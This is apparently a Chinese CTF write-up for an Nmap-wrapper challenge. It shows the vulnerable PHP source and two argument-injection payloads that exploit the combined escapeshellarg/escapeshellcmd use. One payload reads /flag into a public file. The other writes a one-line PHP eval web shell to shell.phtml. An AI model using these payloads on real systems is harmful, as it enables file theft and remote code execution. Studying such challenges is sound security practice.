C
C
CTF-WriteUp
Search
⌃K

[朱雀组]Nmap

康康源码:
index.php
<?
require('settings.php');
set_time_limit(0);
if (isset($_POST['host'])):
if (!defined('WEB_SCANS')) {
die('Web scans disabled');
}
$host = $_POST['host'];
if(stripos($host,'php')!==false){
die("Hacker...");
}
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$filename = substr(md5(time() . rand(1, 10)), 0, 5);
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
if (is_null($result_scan)) {
die('Something went wrong');
} else {
header('Location: result.php?f=' . $filename);
}
else:
?>
settings.php:
<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readble/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');
# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');
# Comment this line to disable web scans
define('WEB_SCANS', 'enable');
# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');
# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');
?>
主要语句:
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
带入之后相当于:
$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host
方法一:直接读flag写入文件
  • -iL:从文件中加载目标
  • -oN:将扫描后的文件信息以“Normal”的形式输出存储
' -iL /flag -oN flag.txt '
访问flag.txt
方法二:一句话木马绕过php过滤
'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '